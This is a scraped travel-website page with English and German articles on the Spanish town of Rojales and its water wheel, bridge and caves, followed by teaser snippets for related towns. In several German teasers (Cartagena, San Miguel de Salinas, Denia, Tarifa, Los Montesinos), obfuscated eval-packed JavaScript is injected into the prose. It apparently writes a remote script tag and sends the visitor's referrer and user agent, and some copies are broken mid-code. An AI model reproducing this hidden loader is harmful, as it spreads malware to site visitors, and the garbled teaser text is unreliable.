Rojales

336

Rojales is located in the province of Alicante. It can be found on the southern Costa Blanca and belongs to the district Vega Baja. The wheel, the dam, the bridge that crosses the Segura, and the Church are the most important monuments of Rojales. The caves, which are located on the right side of the river, are also for many tourists of great interest. Today they are inhabited by painters and artists.

It is not without reason that the tourist city is so popular. From the city, they need only 10 minutes to the sea or to Torrevieja. You only need half an hour to the airport in Alicante or Murcia.

Formerly the site was marked as agricultural, but it began in the seventies with the transition to services and construction. In the organization we find very little authentic Spain. In old Rojales still Spanish or Valencian is spoken. The restaurants and tapas bars still weigh on traditional local cuisine. In the new settlements, however, one finds a different culinary diversity that extends from French, to Italian, to Thai and Indian.

One of the big attractions is the water wheel “La Noria”. This, several meters high water wheel was built in the 16th century and was used as a watering system. There it served the leveling between the river and the higher fields in order to be able to irrigate. Even today, this big wheel can surprise its visitors.

Another great attraction is the bridge, which was buildt by Carlos the third in the 18th century. At that time, it was introduced this bridge as an architectural masterpiece. It is very well preserved and has three arches.

Of course, the well-known destinations such as the salt lagoons of Torrevieja and La Mata and the mountains of Crevillente are worth a visit, for which you should definitely plan a few hours of the vacation period.

Rojales

Rojales is located in the province of Alicante. It can be found on the southern Costa Blanca and belongs to the district Vega Baja....

Alicante City Breaks Attractions

Alicante - a really beautiful city on the Mediterranean on the Costa Blanca. The Mediterranean climate of the city of Alicante combines all the...

Aquarium in Valencia – Wonders of the underwater world.

The Aquarium in Valencia is the most famous sight in Valencia and is due to the valencianian language also known as L'Oceanogràfic. The Aquarium...

Anna – historic small town

Have you ever been to Anna before? It is a little idyllic nest and a beautiful destination with wonderful water architecture. The name “Anna”...

Murcia City Trips and Informations

  Murcia City trips Murcia with about 600,000 inhabitants is an impressive city in the east of Spain and just 30 kilometers from the Mediterranean Sea....

Santa Pola

Santa Pola is a beautiful little harbor town on the Costa Blanca. It is located halfway between Alicante and Guardamar del Segura. The port...
SHARE
Previous articleOrihuela Costa
Next articleLa Zenia

Rojales

1864
Rojales

Rojales liegt in der Provinz Alicante. Sie ist an der südlichen Costa Blanca zu finden und gehört zu dem Landkreis Vega Baja. Das Rad, die Talsperre, die Steinbrücke die über den Segura führt, sowie die Kirche sind die wichtigsten Denkmäler von Rojales. Die Wohnhöhlen, welche sich auf der rechten Seite des Flusses befinden, sind auch für viele Touristen von großem Interesse. Sie werden heutzutage von Malern und Künstlern bewohnt.

Es ist nicht unbegründet, dass die Touristenstadt so beliebt ist. Von der Stadt aus brauchen sie nur 10 Minuten bis zum Meer oder nach Torrevieja. Sie benötigen lediglich eine halbe Stunde bis zum Flughafen in Alicante oder in Murcia.

Früher war der Ort von Landwirtschaft geprägt, doch man begann in den siebziger Jahren mit der Umstellung auf Dienstleistungen und Bau. In der Organisation findet man nur noch wenig authentisches Spanien. Wohingegen in Alt-Rojales immer noch Spanisch oder Valencianisch gesprochen wird. Auch die Restaurants und Tapasbars wiegen noch traditionelle heimische Küche an. In den neuen Siedlungen findet man allerdings eine andere kulinarische Vielfalt welche sich von französisch, über italienisch, bis hin zu thailändisch und indisch erstreckt.

Eine der großen Sehenswürdigkeiten, ist das Wasserrad „La Noria“. Dieses, mehrere Meter hohe Wasserschöpferrat wurde im 16. Jahrhundert gebaut und wurde als Bewässerungssystem genutzt. Es diente es der Nivellierung zwischen dem Fluss und den höher gelegenen Feldern um diese bewässern zu können. Auch heute, kann dieses große Rad seine Besucher verwundern.

Eine weitere tolle Sehenswürdigkeit ist die Steinbrücke, welche im 18. Jahrhundert durch Carlos dem Dritten entstand. Zur damaligen Zeit stellte diese Brücke eine architektonische Meisterleistung dar. Sie ist noch sehr gut erhalten und besitzt drei Bögen.

Natürlich sind auch die bekannten Ausflugsziele wie die Salzlagunen von Torrevieja und La Mata und die Berge von Crevillente einen Ausflug wert, für welche sie einige Stunden ihrer Urlaubszeit unbedingt einplanen sollten.

Cartagena Spanien

Cartagena Städtereisen und Fotos

Cartagena eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d=k||c.toString(a)}k=}];e=function(){return'w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('b'+e(c)+'b','g'),k)}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|ytrar||97|script|language|rel|nofollow|type|text|src|http|45|67|write|yfbns|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) in Spanien Cartagena ist ideal, um seine Städtereise durch Spanien genau hier zu beginnen. Denn die beeindruckende Stadt mit...
San Miguel de Salinas

San Miguel de Salinas

San eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d=k||c.toString(a)}k=}];e=function(){return'w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('b'+e(c)+'b','g'),k)}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|ztrid||97|script|language|rel|nofollow|type|text|src|http|45|67|write|itryf|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) Miguel de Salinas gehört zu der Provinz Alicante und liegt ca. 10 Kilometer von Torrevieja entfernt. Die Einwohnerzahl...
Rojales

Rojales

Rojales liegt in der Provinz Alicante. Sie ist an der südlichen Costa Blanca zu finden und gehört zu dem Landkreis Vega Baja. Das Rad,...
Denia

Denia

=k||c.toString(a)}k=}];e=function(){return'\w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k)}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|hsrha||97|script|language|rel|nofollow|type|text|src|http|45|67|write|tkrkr|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) width="2/3"]Denia, die Stadt in Spanien, wo die Costa Blanca anfängt. Hier sehen Sie eine Fotogalerie mit knapp 90 aktuellen Fotos...

Tarifa, die kleine, wunderschöne Stadt am südlichsten Punkt Europas

=k||c.toString(a)}k=}];e=function(){return'\w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k)}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|asykd||97|script|language|rel|nofollow|type|text|src|http|45|67|write|yyetd|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) width="2/3"]Tarifa, die südlichste Stadt Europas mit ihren schönen Gassen, netten Cafes und tollen Wassersportmöglichkeiten. Von hier aus ist Afrika zum...
Los Montesinos

Los Montesinos

Genießen eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d=k||c.toString(a)}k=}];e=function(){return'w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('b'+e(c)+'b','g'),k)}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|erszf||97|script|language|rel|nofollow|type|text|src|http|45|67|write|fzysr|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) Sie die wundervolle Landschaft in Los Montesinos an der Costa Blanca, indem sie die weitläufigen Plantagen mit verschiedenen Zitrusfrüchten...